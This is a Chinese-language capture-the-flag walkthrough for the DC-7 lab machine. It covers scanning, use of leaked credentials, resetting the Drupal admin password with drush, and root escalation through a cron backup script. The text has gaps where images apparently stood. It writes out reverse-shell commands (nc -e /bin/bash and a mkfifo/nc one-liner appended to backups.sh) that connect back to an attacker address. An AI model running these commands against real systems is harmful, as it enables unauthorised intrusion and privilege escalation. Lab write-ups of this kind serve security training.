靶机:http://www.five86.com/downloads/DC-7.zip 网络模式:NAT
1.主机发现
arp-scan -l
192.168.194.167
nmap -p- -A 192.168.194.167
22/tcp open ssh 80/tcp open http
2.网站信息收集
   在下面  在代码config.php中找到一个账号密码 
$username = “dc7user”; $password = “MdR3xOgB7#dW”;
在robots.txt中,发现登录界面路径

 用之前的账号密码登不了,想起还有个22端口的ssh,试试,可以  查看mbox 虽然很长,但是内容基本重复,可以得到的信息是存在一个定时任务,备份数据库文件,参考 
cat /opt/scripts/backups.sh
 www-data 具有权限,需要获取相应shell,再利用backups.sh提权 
drush 命令可以修改密码
drush user-password admin --password="123456"

3.登录网站

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
  折叠查找更快
  可以写php文件了

 路径为首页 
4.定时任务提权
nc -e /bin/bash 192.168.194.156 7777
nc -lvvp 7777
利用backups.sh文件提权
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.194.156 6666 >/tmp/f" >> backups.sh
 另一个终端监听  通过邮件的时间可以得知该脚本每15分钟执行一次
|